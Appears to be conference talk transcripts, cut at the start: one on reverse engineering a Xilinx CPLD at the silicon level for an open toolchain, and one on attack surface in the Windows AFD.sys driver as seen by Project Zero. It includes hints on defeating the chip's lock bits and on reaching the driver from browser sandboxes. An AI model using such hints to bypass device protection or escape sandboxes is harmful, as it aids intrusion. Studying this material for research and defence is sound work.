metal two. You can actually see the lines coming off the send sample fires for the EPROM going up and vertically into the array. And if you trace it out all the way, you can actually see it writing to the individual configuration SRAM cells in the die. There are a few bit lines here and here, for example, that are connected and I believe metal three instead of metal two. They couldn't fan it all out in one layer. So now let's take a look at the main logic array. If we actually look at where the SRAM cells are and count how many rows high each individual block are, we see that the end array is 20 rows high, the or arrays eight rows high, other half is 20 rows high, and each macro cell is three rows high. So that gives us a pretty good idea. We know left, right, which bits in the bit stream configure which logic just by what's physically proximate to it. And we can make a pretty good guess that since we have a 2DS for MRA here in the configuration area, we have a 2D flash array, we probably have either top to bottom or bottom up addressing. There's actually some gray code going on. It's a little more complex than that, but logically we should have the addressing going across vertically. So if we take a closer look at the end array, we know that there are 56 product terms. 
We know that there are supposed to be 40 rows and 40 complements of rows for a total of 80. If we actually count how many SRAM cells are, we'll see there's one 12 bits wide, just 56 times two. There's two blocks of 20 rows each. So the conclusion is that since we know there's 40 inputs coming in from the crossbar, we've got two blocks that are each 20 rows high, each row probably corresponds to one row of input. And then we know that the width of the array is double 56. So it's probably two bits per product term. One selects X, one selects non-X, or maybe some sort of other code. As it turns out, it is one-hot coded. I just figured this out by experiment. It was pretty easy. Just try one, see if it works. If not, try something else. There's only four possibilities. So the or array turns out to be 56 and terms, 16 outputs. If we count the config bits, it's still one 12 bits wide. It's the same, coming up off the same EEPROM, but it's only eight rows high. And there's only 56 inputs. Since the or array does not have an X and X prime input, my conclusion is that we still have one hot select thing for one particular input, but we do have two actual arrays of the or array interleaved in one configuration row. I got a little tinkering. It was pretty simple to figure out the actual bit ordering. So now let's take a look at the macro cells. There are 27 configuration bits per macro cell. If we look, you can see there's one 60S RAM cell, one 60S RAM cell, and so on. There's a 9 by 3 grid. It turns out this 9 by 3 grid does not actually control one macro cell. The bottom two rows of this RAM control the bottom one. This goes to the upper one. This threw me off a little bit when I started looking at the circuit, but it turns out that yes it is 27 cells, yes it is 9 by 3. No, the 9 by 3 structures in the die do not actually correspond to this. So this makes intuitive sense. The EEPROM at the bottom of the die is, well, okay, it's 10 bits wide, but we know one of them is a transfer bit. So the other nine bits go directly up to here. I've figured out a significant fraction of the functionality, not quite all. There's still some clocking stuff I'm a little unsure on right now. These also configure IO buffering and stuff like that. So there are lines coming out from these to the side of the device and controlling the IO buffers. Now I will, as a quick aside, jump into the security bits. We know there are nine done bits and lock bits somewhere on the device. We know that the physical address of these is in the right hand macro cell memory. It's in the top row. There's nine 60S RAM cells right here that don't appear to be hooked up to any of the actual logic array. I have not actually tried fibbing these. I don't know for certain that these are the lock bits, but it is pretty obvious. Especially when we know of those nine bits, four of them have to be held low to lock the device. There's a four input NOR gate right here and an inverter right there. Hmm, I wonder what happens when I cut that line. I don't know. So now we'll get to the global routing. So we know between the left and the right halves of the end array, there is something. We know that it is 20 configuration bits high for each half. We know it's 16 bits wide. We don't know anything more than that. The data sheet has about two sentences that talk about the global routing. So there is, we have no idea whatsoever how it works. 
What we do know is that of those 65 signals coming in, we know that 20 of them go to the left function block, 20 go to the right. Those subsets may or may not have any relationship. And we know since it's 16 bits wide, we probably have eight bits selecting what goes left and eight bits selecting what goes right. So now here's the question. How do you make a 65 to one MUX with eight bits? If you just had zero to 65, you'd only need seven bits. If it was one hot, you'd need 65 bits. So what sort of strange, perverse code are they using here? The data sheet is of exactly no help. Well, time to get dirty. So if we jump into the electron microscope and take a look at the implant layer after dash-ups, so you can see these areas here show up raised. Those are P-channel. These are N-channel. You can see that it's slightly lower. The raised areas are the individual channels for the FETs. This is zoomed out. The original image is a lot higher resolution, but I can't really fit it in the projector. So this is the implant layer. What we can see immediately is that there's some sort of symmetry going on, both horizontally and vertically. If we jump up to metal four, we see that there are six small buses of 11 signals each. The rightmost is 10. All right? Five times 11 plus 10. What's that, anybody? 65. Hmm. There are 65 signals going into global routing. I think we found them. So I spent quite a while in Inkscape vectorizing this. My automated tools are not quite as well-developed as I had hoped. So it did take me a while, but I do now have a full vectorization of the entire global routing matrix from implant layer all the way up to metal four. The little gray boxes are not actually layout. There are standard cell outlines. So we've got a inverter here, another inverter here, another inverter here, and so on. So we can see that there are six identical blocks going left to right here. There's two weird blocks over there that are identical to each other at first glance, but not identical to the rest. Okay. This is starting to get interesting. So those big drivers on either side are pretty clear of the buffers driving the PLI. We've got a fan out of 112. We need a fairly big buffer. There are, I believe, 20-some fingers on this last inverter. So that looks like a high fan out driver. It's actually a three-stage inverter because the low-level stuff in the programmable logic doesn't actually have the drive current to drive that much gate capacitance. So they actually have a three-stage driver inverting it, inverting it again and increasing the current once again to actually drive the output. And of those eight blocks, each one contains two S-rem cells. So it seems to make sense that we've got eight blocks. We know that we have eight bits controlling the left output. We have eight bits controlling the right output. So we probably have one bit per block controlling what goes left and one bit controlling what goes right. Then there's six identical blocks and there's six groups of wiring up in Metal 4. So there's probably some sort of correspondence going on here. Again, we don't know what it is, but we know there's some relationship. So now let's take a look up at Metal 3. So we can see there's power and ground routing here. We'll ignore all of that for now. But there are sets of one, two, three, four, five, six vias per row. What's more interesting is there are always six vias per row, but they're not all in the same place. 
So there is, if we actually trace it out for all of the rows, each one of those vias is under each of the Metal 4 groups. There is exactly one via in each row column intersection, but not at the same place. So now I finally realized what is going on. The routing matrix is not actually a full crossbar. It is a sparse crossbar in which of the 40 rows, each row can only pick six of the 65 inputs. But there's a different subset for each one. And the end result is that using all of these subsets, you can select any unique subset of 40 of the 65. But you don't actually need a 40 by 65 crossbar. So now let's take a look at how the actual implementation works. We have a pretty good hunch as to how this is structured at a high level. We don't actually know what the implementation is. So I do apologize for some of the misalignment. This was a quick tracing. And so not all of the vias and metal layers line up exactly. This is not meant to be something you can clone the chip from. It's meant to be something I can figure out how it works from. So you can see there's a big pass transistor here. We've got the signal coming in from the upper layer here and here. And then we've got an output of the mux here. There's an SREM cell that goes through a two input NOR gate and then drives that. So if we put this all together, what we see is that each row is indeed an 8 to 1 tri-state box mux. So there's one pass transistor that selects each of the six possible outputs for a row. Then there's a single discrete NMOS and a single discrete PMOS that lets me drive constant 1 or constant 0 as well. It turns out that the driver for constant 1 is active high. All the rest are active low. So this means that a blank bit stream of FF won't cause bus fights. It'll put all the outputs in a well-defined state. So this makes sense. And all the other signals are active low. There's also one additional signal I've called O-Gate. I have no idea exactly where it comes from, but I'm pretty sure that it's used during the boot process to basically pause the device, don't drive any of the outputs. It'll consume less power when the chip is idle. And it also prevents bus fights between drivers that aren't fully configured. If we've got half the device flashed and half not flashed during the boot process, we don't want to be driving signals onto nets that some other thing might still be driving with the old firmware. So as long as the signal is high, it gates all the outputs. And the rows are, again, not identical. But it turns out we can actually do the routing using MaxFlow. We just create a source node for each of the nets we want to route. We create a directed graph with paths for each of the legal connections to each row. Then we create a sync node with however many nets that we want to draw out. And we can just use MaxFlow to route everything. So as it turns out, the structure is pretty much that. I do have a full schematic. This is not it. I've kind of truncated the bottom to make it fit on the slides. But we've got a single configuration bit. We've got the NOR, which I've actually drawn as a negative logic AND because that's really how it's functioning. Output of that goes to a single PMOS pulling high. We've got an NMOS pulling low. Then we've got MUX in top A0, MUX in top 90, and so on. Those are the actual hex codes in the bit stream for selecting that particular input. So we make that row be set to A0 if we wanted to write to this element. 
And I do also have a table in the source for my tools that includes all the MUX settings for this device. So I now can fully control the global routing matrix. But there's one last bit. We know the ordering of the inputs. We know how to select one of the inputs and drive something. We don't know which input is actually hooked up to which signal on this bus. So time to get dirty again. There were a couple of options I considered, but it turned out that one of the simplest was to make a few educated guesses about how things were structured. So for example, all of the macrocells in function block one, they are flip flops, are probably in a contiguous order on the bus. We don't know where on the bus they are, but they're probably contiguous. All of the input pins for function block two are probably contiguous as well. So let's tinker around a little bit. Okay. The inputs to function block two are probably contiguous. So there's not really that many orderings for the global input pin and these four sets of inputs. Let's just try tinkering and see which one works. So I went up to campus, hopped on the focused ion beam, drilled a few holes in the insulator over some wires, and laid down some nice gigantic 20 micron square probe pads. And then I just started driving signals onto each net. Here's the code I'm using. It's just a counter going from a 2 megahertz input dividing down to, I believe, a 2 hertz LED. And then I have one signal before that. So 4 hertz is on a specific flip flop that I've constrained the two. I was like, okay, here, function block two, macrocell five. So let's see. If we probe function block two, macrocell five, or if we put a signal on function block two, macrocell five, it's supposed to be 4 hertz. And we've got a probe pad on this signal. Is it a 4 hertz square wave? Oh yeah, it is. All right. I guess it's right. So it didn't take too long to figure out the actual bit ordering. So here's the basic summary of the actual layout. We've got gates on metal one and poly. Metal two is vertical routing, SRM bit lines, O-gate. Then horizontal routing on M3. Then M4 is the input bus. It turns out the actual ordering is the GPIOs for function block one, the global input, GPIOs for function block two, then the flip flops left to right. So now we know pretty much enough to configure the PLA. Unfortunately, there's more to it. Because it turns out all of the product terms, or nearly all of them, are dual purpose. They can be used as general purpose logic. You can feed them into the OR array. But each of the 16 macrocells also has three product terms that have separate dedicated connections to it. These are used for set, reset, clock, enable, and so on. I'll cover some of this in the next slide. Four more have special connections to the entire function block. And the last four, as far as they can tell from reading the datasheet, they have no special purpose. The datasheet does tell us these things exist. They tell us roughly what they do. They don't tell us which of these 56 product terms does what. So I will just briefly cover what these terms are. So we've got per function block, we have a local clock that we can use. So we don't want to waste global clock resources for the whole chip. But we also don't want to have a per flip flop clock because that will both increase skew and use a lot of product terms that we really don't need. Then we have dedicated set and reset and dedicated output enables. Then per macrocell, we've got product terms A, B, and C, very inventive naming. 
So product term A is one of several legal sources for set, reset. There's also a, the control term set and reset can be used instead if you want. There's product term B, which is one of several possible sources for the IO buffer output enable. And then product term C, which can be used for a couple of things. If you've got a clock enable, it's used as a clock enable. If you want a per macrocell clock, for just one flip flop that you're clocking off one weird clock that nothing else is clocked by, you can use that. And it also drives an XOR gate. So it turns out that this isn't quite a conventional CPLD structure. The output of the PLA is XOR with product term C or its complement or a constant one or constant zero. This is a Xilinx proprietary optimization. That is, again, documented in the data sheet, but they don't tell you how to configure in the bit stream. The intention here is to allow you to do efficient adders. You've got XOR. You don't have to do not X or Y, not X and Y or not Y and X. So you can just use the XOR gate. So the question is, okay, we've got 56 product terms. Which one is PTC? No idea. Well, it turns out we can configure the PLA as much as you want. We already know how to configure that. We've reversed all the bets for that. We can configure the global routing as much as you want. And it's fairly easy to generate a bit stream that is known to use product term C from the tools. All we have to do is either synthesize something with an XOR in it or it turns out there's actually an optimization of the tools. If you are not using the OR array, just say we just have Y equals A and B. It turns out that if we set the OR array to output a constant zero and then we XOR that with product term C, we no longer have the OR array in our critical path. So you can sheave about 500 picoseconds off the propagation delay by doing this. The compiler trying to optimize speed does this by default if you're not using the OR array. So therefore, just by creating an equation like Y equals X in your source code, you can trivially produce a bit stream that uses product term C. So all we have to do is say, okay, let's make something that uses product term C. We'll spam these black box macro cell bits into all of the outputs and just start feeding inputs into various product terms until we find one that hits. Well, it turns out it is zero based term 3N plus 10. Unfortunately, I have things called customers that kept me from working on this project as much as I would like. So I never actually figured out what product terms A and B are. I'm pretty sure that they're either just above or just below product term C. I don't know which. The control terms, if you remember, product term C is 3N plus 10. So below number 10, none of these terms are actually being used for anything in PTABC. So the control terms are probably among the first couple of terms. But again, I have not actually had time to figure out which is which. One more wrinkle is that there are some global configuration bits. So if you remember, we've got the structure of the die on the left side and the right side. I've got the function blocks and the top. I've got global routing and the bottom. I've got global routing. So that pretty much makes a big donut shape. In the middle of that, there's wasted space. But no, it's not actually wasted. There's 22 single configuration bits, the middle of the die. We know three of them control the VT for the IO banks. The device has two IO banks, but the original XC2C32 only had one IO bank. 
So they did a clever hack. They are now bitstream compatible with the 2C32. They added four more configuration bits. So the way they did this is they have one global bit. If this bit is set, then it will use the old school XC2C32 configuration setting for this. The newer ones are two additional per bank bits. So it actually just does a bitwise add between the global bit and the per bank bit. If you erase the device and you don't program these last couple of fuses, then you will get the default XC2C32 behavior in which you've got one IO standard for everything. If you're compiling for the 32A, now you set that other bit as a constant one. Leave the other one set the way you want. And now you get the ability to set VT for each bank independently. So it's actually pretty clever. Then there are other miscellaneous things that are there. The comments in the bitstream were a little bit helpful for this. So I know there's three bits that configure global clocking, two bits that configure global set reset, eight that configure global output enable. I do not actually know what the coding for these bits are at this point. So there's still some work in progress going on. Now I will get to the actual tool chain that I'm producing. I've called it libcrowbar after the flying crowbar project on SiliconPron. The goal is to, in general, produce open source tools for programmable logic. It does need a lot of refactoring and tweaking. It does not do nearly everything that I want. It only supports the 2C32A right now. We can scale to other devices. The 64 cell device is pretty much just a scale up of the 32. I've decapped it. I've looked at the top layer. It's just a 2x2 grid of function blocks instead of 1x2. The ROM for the routing fabric will have to be decoded separately, but that shouldn't take too long. The ordering of the bits will have to be decoded, but again, that shouldn't take too long. I can probably just brute force it. And the macro cell configuration and everything else is pretty much exactly the same. The larger device is the 128, 256, 384, and 512. It adds some additional features to macro cell. So in addition to figuring out the actual routing stuff, I will actually have to do some additional reversing of the macro cell logic. So that remains a work in progress, but that is a goal. The library is BSD licensed. You can grab the code from there. I do not recommend attempting to use it in its current state. It's more of something to look at and understand how the chip works. And maybe in a couple of months, it will have something that's actually stable enough you can actually use. But I do have a quick usage example here. So we have a bunch of IO pins. We select P8, P6, P38, P37, whatever. Then we get the IOBs for each of these. We can now select the IO standards, some output enables. We're not going to use termination. We're not going to use Schmidt trigger. These are all bits in the macro cell that I was able to figure out. There are still quite a few related to the clocking that remain unknown at this point. And then there's quite a bit more going on below this. I can pull out full source if anybody is interested in looking at it. But the end result is that I can go from an in-memory technology map net list created like this as C++ objects. I can then place and route this, produce a valid bit stream, flash the device and have it work. I can also go the other way around. I can go from a program device. I can read out the bit stream. I can turn it into an ASCII art schematic. 
And I can turn it into synthesizable Veralog as long as you're not using the features I haven't yet reversed the functionality of. The remaining thing in the forward tool chain is I would like to integrate with YOSIS for synthesis, take the output of YOSIS, do technology mapping on that and then feed it into libcrowbar. At that point I will have a full Veralog to bit stream tool chain. I'm not quite there yet, but it's coming close. The other tool I've made, if any of you have used plan ahead from Xilinx, I called mine very inventively FC plan for the flying crowbar floor planner. So it is a floor planner and physical layout viewer. I currently only have rendering for the and array and the global routing. The or array, I do have the functionality reversed. I have not written the code to actually draw it, but I can actually open up a bit stream and look at the individual settings in the and array. The macro cells also, I've reversed some of the bits, not all of them, but I have not yet written code to actually render the appearance of them as check boxes for, okay, instrument trigger is enabled, the terminator is enabled, the slew is fast or slow and so on. So those all remain in the wish list at this point. The configuration bits are known. You can access them from libcrowbar. You cannot do so in the GUI. So here's one more view of FC plan. This is showing as you zoom out, the product terms shrink down to smaller columns. You can see the full global routing matrix here. This is the actual via pattern. It doesn't show up as well in the projector again as I would have liked, but you can see the actual mux bits in there. When you zoom in in the tool, you can actually see the signals coming in from the global routing going out through these vias and into the and an arrays. Before we get the demo, I do want to thank John McMaster from SiliconPron. Hi, John. He did most of the large scale optical imagery for this. He also did the dash etching, which was very helpful. Then Ray Dove and Brian Colwell at RPI run the material science lab in the clean room respectively. They were quite helpful when it came time to getting access to the electron microscope in the clean room and so on. As far as I know, I am the only computer science student there, whoever ran the electron microscopes. But I did actually get access to the clean room, the SEM, the FIB. I was trained on all of them and they were quite helpful. Then the SiliconPron team in general was quite handy when it came to just getting feedback and sanity checking and does this look okay to you? I can't quite make out what this connects to. Do you have any ideas? Or just sharing process suggestions, okay? What are some ways I can get this edge to be a little more even? Something like that. Now, I'm to attempt the demo gods. I have my JTAG daemonic connected already. This is my dev board. It has a small FTI 232 on there that I'm using for JTAG. What I'm going to do is I'm going to create a bit stream using lib crowbar that will act as a not gate and a buffer. Then I'm going to bit bang inputs going into there with the FTI chip. We should see one LED and then the other alternative lighting up. I don't know if you guys can see. Right up here, these LEDs are blinking back and forth. If we scroll through the output here of the tool, you can see we start out initializing. We connect to the JTAG chain. We see okay, there is a device. 
One odd note, the cool runners are the only devices I've ever actually looked at in which the JTAG device ID actually includes the package as well as the device. What this means is that they've actually got a fuse somewhere in the die that says, oh, this is a TQFP. This is a BGA. I've never seen that on any other device. Any other FPGA or microcontroller, anything I've used, the device ID was the same between different packages. Anyway, so we confirm, okay, yes, the STDI chip has GPIOs on it. We generate our net list. We figure out the actual function block and macrocell locations of the IO buffers we're using. Then it runs the fitter through IO banks, macrocells, function blocks, does global routing, repeats for the other function block, does global routing for that, confirms okay, fitting is complete, took 620 microseconds. If any of you have used the Xilinx Compilers, they're not that fast. Then we finish generating the bit stream. That's kind of slow. Right now, it took a couple of milliseconds. I'm pretty sure I can optimize this. Monk, this is a debug build of profiling turned on. So it'll be a lot faster if I actually compile the optimizations. Then we actually configure the device. We verify, okay, yes, we are talking to the right device. We've got the right number of fuses. We erase it. We make sure it's blank. Then we just bit bang the out as 0 and 1. It confirms that the loop back going back to the FDI chip does have a value that we expect from one of MsX and one of MsX prime. That looks good. Now, let's see what happens if we actually want to reverse this. Let me see if I can up the font size. Can people read this? I'm guessing no. Is that better? All right. So this is what happens when we actually try dumping the bit stream. This is not the same bit stream. This is a different one. I just picked that random I had sitting around. So we have a nice ask your schematic showing all the inputs coming in from the PLA or coming in from the global routing. Each of these represents one connection. That's one configuration, but it's actually connected to something. We have the X and the X bar outputs. Nice big grid. Then 56 product terms to the or array. We've got outputs going to the agris array. This table looks a lot nicer at 1080p when your font isn't quite so big, but I do actually have details on, okay, this output is floating. This one is configured as an input, this is an input, this is an input. There's an output in here somewhere, probably on the other one. Whatever, I must have scrolled past it. So now on the output, we have the IO standard. It turns out even though there's about a dozen IO standards you can pick from its emphasis time, in the bit stream there's only two. There is the high voltage and the low voltage. So there's 1.8 and 1.5 and there's high voltage. So my guess is what this does internally. I have not fully reverse engineered all of the IO driver's arbitrary, but what I'm pretty sure it does is it selects a single threshold or another and then thicker a thinner gate oxide in the output. There's about four or five different sets of drivers in the output for fast and slow, different voltages and so on. I haven't actually done TEM cross sections and measured VTVs transistors or anything like that. It wasn't necessary for this. And then we've got a bunch of stuff here for the global clock muxes, global reset muxes and everything. And all this remains unknown. I know roughly, I know which bits these are. I don't know what the functionality of those bits is. 
And then, let's get to the fun part. Let me actually switch to the adder test .jed file. This one is simpler: it's a 4-bit adder, which will make a lot more sense than the 32-bit adder I was showing in the other one. So here's our RTL. It is pretty much the assembly language of Verilog, a direct analog of the actual PLA structure. I have not attempted to figure out any higher-level structure, but this is actually equivalent. I have not tested synthesizing it; I actually just found a bug last night here, where that value should be quoted. So right now the output as formatted won't synthesize, but it would be fairly trivial to fix that and make it actually synthesize and work. And then I've got function block 2; there's not really anything in there. So now, before we get to the questions, I'm just going to jump up to fcplan and show you guys what the actual structure looks like in the floor planner. I guess I found a bug; the scroll on this thing is really sensitive. All right. Can I go just one click in? All right, that's probably good enough. So you can see what I've got. Initially we're bypassing all the inputs, so we're not using the first couple of rows coming off the global routing. Then down here I've got one signal coming in. It's hooked up over here to X, it's hooked up over here to X-prime, goes into the AND gate, then we go down there, and so on. So we do actually have a full physical layout viewer at this point. So now I'm just going to jump back to the slides for just one or two more before we get back to... So what remains as far as future work? We still have to figure out the last of the special product terms. There are still about six or eight bits in each macrocell that we have not yet figured out the functionality of, and there are still some more in the global bits. As I did mention, there is a little bit more I need to do to support larger devices. As far as the toolchain, I want to do more work on the decompiler. My long-term goal with this work is to integrate with some other bitstream-reversing projects and so on, and create the IDA for hardware. I would like to be able to go from bitstreams for CoolRunner, bitstreams for Spartan-6, bitstreams for Stratix IV and everything, and go from that up to a device-dependent, technology-mapped netlist; abstract that up to a device-independent netlist, something more along the lines of an LLVM IR for hardware; and then do higher-level analysis on that to figure out, okay, this combination of XOR gates and muxes looks like a 32-bit adder, this combination of stuff looks like a 10-to-1 mux, this combination of stuff looks like a Cortex-M3. I would like to eventually be able to have something along the lines of FLIRT here. I do know that subgraph isomorphism is NP-complete. I don't know if I can make a randomized or approximate algorithm that's fast enough; that remains a topic for future work, but it is on the wish list, whether it is physically possible or not. So, at this point I'll take questions. Seeing none, I guess we're done. Thank you. Thank you.
|
Programmable logic devices have historically been locked up behind proprietary vendor toolchains and undocumented firmware formats, preventing the creation of a third-party compiler or decompiler. While the vendor typically prohibits reverse engineering of their software in the license agreement, no such ban applies to the silicon. Given the choice between REing gigabytes of spaghetti code and looking at clean, regular die layout, the choice is clear. This talk describes my reverse engineering of the Xilinx XC2C32A, a 180nm 32-macrocell CPLD, at the silicon level and my progress toward a fully open-source toolchain (compiler, decompiler, and floorplanner) for the device. A live demonstration of firmware generated by my tools running on actual hardware is included.
|
10.5446/32819 (DOI)
|
Hello. Yes, we're working great. It's the first conference I've ever been to where everything just kind of magically worked the second I stepped on stage, so thank you very much to the audio and visual crew here for making that an incredibly easy process. My name is Steven Vittitoe. I work for Google on the Project Zero team. Relevant contact information is here if you have questions or you want to get a hold of me or complain to me; you'll find my Twitter handle and email address. I also play a lot of capture the flag; I play on the Samurai CTF team, and if you want to play CTF, I would encourage you to do so. It's a great way to take reverse engineering skills and apply them directly to vulnerability analysis, which is really kind of how this research started. I was hunting for bugs in AFD.sys, and while I didn't come away with any bugs, I came away with a pretty good understanding of the driver and felt that was worth documenting. So, in outline, we're going to talk about why I was even looking at AFD.sys to begin with. It's not because it starts with A; I didn't just list all the modules and say, well, we'll go with that one. I'll give you a kind of Winsock overview; AFD is a part of this overall system architecture in Windows called Winsock. We'll go through some of the interesting findings in the driver itself: how you can talk to it, where it initializes from, and how you can use it to your own benefit. I'll tell you about the vulnerability analysis I performed on it and some of the fuzzing work that I did, and then we'll wrap up with what I'd like to do with this in the future; hopefully we can encourage other people to get involved with this kind of research as well. So what is AFD.sys? It's a default kernel module. The module is in system32\drivers; you can go look at it and get the file properties on it, and you'll see it says the Ancillary Function Driver. There's a story behind this name, actually, that it used to go by a different name. Does anyone know what it is? Yes, sir. Another Fucking Driver. So you can imagine the guy just sitting down programming drivers all day long, and at the end he has a thirtieth driver to program, and he's like, another fucking driver. He named it that initially, but had to change the name before release. So, Ancillary Function Driver, which is the ring-zero entry point for socket(). When you do a socket call, you bounce around in this user-mode architecture, but it doesn't actually do anything for you until you hit the kernel, and we'll tell you more about how that works. Now, not everything in Windows uses AFD for network communications, and Microsoft is sort of notorious for this, for building multiple systems that do the same thing. You could talk to the network in at least four different ways: you've got AFD, you've got WinHTTP, which will go through HTTP.sys, you've got WinInet, you've got WebDAV communications, and you've got mrxsmb for SMB clients. So basically networking, file systems, and special optimizations for internet-heavy communications. But this is the one that was really interesting to me, with the BSD socket APIs. And why we're interested in it: not because it starts with A, but because it is very accessible from sandboxes. If you look at the Chrome sandbox, the renderer process, for example, has access to \Device\Afd\Endpoint. You can open it, you can send ioctls to it, even as a guest user on your system. Same with Adobe Reader, and same with IE Protected Mode.
In fact, every sandbox that Project Zero looked at, and really that James Forshaw on Project Zero looked at, had this device accessible. So despite the fact that you can't initialize Winsock in, say, the Chrome sandbox, you can't call WSAStartup, you can still open the AFD device and send ioctls to it to make your network communications without the benefit of the user-mode Winsock framework. This is immediately interesting: you get this functionality by sort of bringing your own Winsock along in shellcode or whatever you have. And for bugs, there's a history of bugs; there's been about one good one a year. One of these was an information leak, but the one last year, in 2014, was a full-on privilege escalation that was really well documented and actually ended up being used as part of a chain of bugs to take a $100,000 prize at the Pwn2Own competition. So Google was naturally interested in this as well and continued to do some of this research. Okay, so as I said, I work for Project Zero, and sort of the one-line mission statement of this team is to make zero-days hard: not impossible, but more difficult, so you can't spend a week fuzzing something and walk away with a zero-day that'll get you onto 100,000 computers, right? We need to make that a more difficult process, and we have three approaches to do that. The first one is to make sandboxes more difficult to get out of. Sandboxes are a widely adopted technology already; you see them in Chrome, IE, Reader, and Office apparently now too. The idea behind them is to increase attacker cost: you have to use an exploit to get into the sandbox and then an exploit to get out of the sandbox. We feel that the process of getting in is easy, so the second approach is that we'll make that harder by fuzzing out low-hanging fruit, and the third is that we'll do a lot of manual analysis on the sandbox to make getting out harder as well. We've historically seen three big ways of getting out of sandboxes. The first one is logic errors in a broker process, where you have a sandbox and you can't write any files, you can't make any network communications, you can't do any registry reads, except you actually do need to pull this one configuration, so you talk via IPC to another process that has the permissions to do what you need, and then you can get in through just that one narrow path. Sometimes there are a lot of these exceptions to a sandbox, and we'll find logic errors in those things. Second, a sandbox is only as strong as the kernel that it's running on, or the accessible part of the kernel that it's running on, and you find things like win32k.sys coming in at 3.1 megabytes, with I don't know how many hundreds of system calls you can hit off of that. These are both well-known things. The one that you don't see a whole lot of people talking about was accessible devices. So beyond AFD being accessible, there's also your USB hub accessible through most sandboxes as well. This is a not-often-talked-about attack surface for the Windows kernel and for sandbox escapes in particular. And you actually can't even disable this thing until Windows 8. You could go in as an administrator and change the permissions on the device, but then no one can make socket calls on your computer, which is not something you want to do. On Windows 8 you can use an AppContainer with a lowbox token and disable access to that specific file, but that's not a simple process to do.
It's not like, say, it's restricted to one particular usage or technology; it is something that is always there and has always been there. In fact, it actually dates back to Windows 95: if you fire up a 95 box, you'll see AFD.sys running and doing much the same thing that it's doing today. So we have this kind of perfect storm of complexity and accessibility. And when I say complexity: you can take a real quick glance at it and you see that it's 500K. Most drivers, if you look at them, average less than 100K in size. It's not as atrocious as a 3.1-megabyte driver, but it's still quite sizable, and it will handle 70, 71 ioctls out of the box, directly off of the endpoint. And it is designed to map between different protocols, so it's handling everything from TCP/IP over IPv4 and IPv6, TCP, UDP, and raw sockets to SAN requests. There's quite a lot going on here that it's trying to account for all at once. This is a very dated diagram, but it kind of gives you an impression of where Winsock lives, how it works, and where AFD fits in that picture. Across the top here you'd have your applications; these will largely be 32- or 64-bit Windows applications. They'll talk to ws2_32.dll directly now, so you don't see the old winsock import from Winsock 1.1 back in the Windows 98 and 2000 days. The application will call socket. So if you started off your application, you did a socket(AF_INET, ...) call. You'd have to initialize this first, obviously; this is WSAStartup, which will load all these DLLs into memory. But the socket function first goes to ws2_32, where it immediately calls the WSA version of socket. You see this a lot in Microsoft code, where you have a wrapper with one function just calling off to another one with the exact same arguments, maybe a couple of them null. And then from here, that pretty much gets out of there really quickly too and goes off to mswsock.dll, which is where a lot of the functionality is actually implemented. mswsock then has an abstraction to say which protocol you actually want to talk to. In this case, we're saying we want to talk TCP/IP, or AF_INET. We could pass AF_IRDA and we would be speaking infrared as well. There is a different helper DLL for each protocol that you could load, and this is all very well documented and understood in Windows, how to write these helper DLLs, so I won't spend a whole lot of time going on about it. But basically, we bounce to the helper DLL and then back out to mswsock, and that's where ioctls start to happen to AFD.sys, down here in kernel mode. So it's the first stop in kernel mode. When you make a socket call, there are actually three ioctls that happen. The first two pull information about the specific protocol and socket type you tried to open, and then they set that information into an AFD structure that is created when you first open \Device\Afd\Endpoint. That structure will contain your unique data: this is for AF_INET, this is a SOCK_STREAM socket, and that will control how AFD reacts to the rest of the calls on this endpoint based on that initial setup. Oh, this is kind of funny too. Microsoft is very, very good about being backwards compatible, and if you go and look at some of these files, msafd.dll is literally an empty PE file. It has one export shimmed to point to mswsock, but otherwise it is pretty well defunct, still existing as an artifact to provide compatibility.
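To make the "you can open the device and send ioctls to it yourself" point concrete, here is a rough C sketch of opening \Device\Afd\Endpoint with the native API from user mode. It is deliberately incomplete: a usable socket endpoint additionally needs an extended-attributes blob describing the transport, which is omitted here, and the disposition and attribute constants are spelled out as literals to keep the sketch self-contained.

#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

/* Rough sketch only: opens the AFD device the way the user-mode framework
 * does under the hood. Passing a NULL EA buffer just opens the device;
 * a real endpoint needs the (undocumented) "AfdOpenPacket" EA blob. */
HANDLE OpenAfdEndpoint(void) {
    UNICODE_STRING name;
    OBJECT_ATTRIBUTES oa;
    IO_STATUS_BLOCK iosb;
    HANDLE h = NULL;

    RtlInitUnicodeString(&name, L"\\Device\\Afd\\Endpoint");
    InitializeObjectAttributes(&oa, &name, 0x40 /* OBJ_CASE_INSENSITIVE */,
                               NULL, NULL);

    NTSTATUS st = NtCreateFile(&h,
                               GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE,
                               &oa, &iosb,
                               NULL,                  /* AllocationSize  */
                               0,                     /* FileAttributes  */
                               FILE_SHARE_READ | FILE_SHARE_WRITE,
                               3 /* FILE_OPEN_IF */,
                               0,                     /* CreateOptions   */
                               NULL, 0);              /* EaBuffer, EaLen */
    return (st >= 0) ? h : NULL;                      /* NT_SUCCESS      */
}

From there, NtDeviceIoControlFile on the returned handle is how the bind, connect, and send operations are actually issued; the specific AFD control codes are undocumented and not shown here.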
So in this way, AFD really acts as a translator between the multiple protocols that can be specified in user mode and a lower-level kernel abstraction. AFD is not your network driver; it's not sending out your packets, but it is translating your calls to either TDI or WSK. WSK is Winsock Kernel: they sort of extended this user-mode architecture down throughout kernel mode. And TDI, they're going to deprecate it, you shouldn't use it anymore, same as things like layered service providers, in favor of the Windows Filtering Platform, but it's still there, and when you're making a plain socket call, this is what it's going through: it's still going through TDI. Kernel-mode clients that want to open a socket can use WSK to open a socket, and this is actually implemented in AFD.sys as well. AFD.sys becomes a Winsock Kernel provider, and you can see it registering for all of these inputs too. Unfortunately, you cannot hit the WSK code from user mode; otherwise really interesting things would happen, and that would be a topic for vulnerability analysis all on its own. My interest was simply what was accessible from the sandbox, so I was looking at the roughly 70 or 71 ioctls that you can hit. So you open up the driver, and at first glance you notice there are tons of debug prints. There are like 113 cross-references to the debug print routine, and there are like a thousand functions in there, so 10% of the functions had debug prints in them. Normally you'd think, well, I should remove debug prints in release builds, or use ETW, Event Tracing for Windows, which also accounts for a significant amount of code in this driver. And you see the debug prints going up over time: from 23 to 113 between Windows 7 and Windows 8. I'm not really complaining about this. It makes reverse engineering this actually a lot easier, because it will tell you, at this offset, what is being printed, and the value of whatever structure offset it was will be shown to you in plain text. So this was useful both for reverse engineering and for turning the debug prints on and having them come back to a kernel debugger, so that you could watch what was happening. And the checked build does similar things. So the first thing it does is create this device, and then it starts reading in configuration from the registry. My best guess as to why this happens is so that you 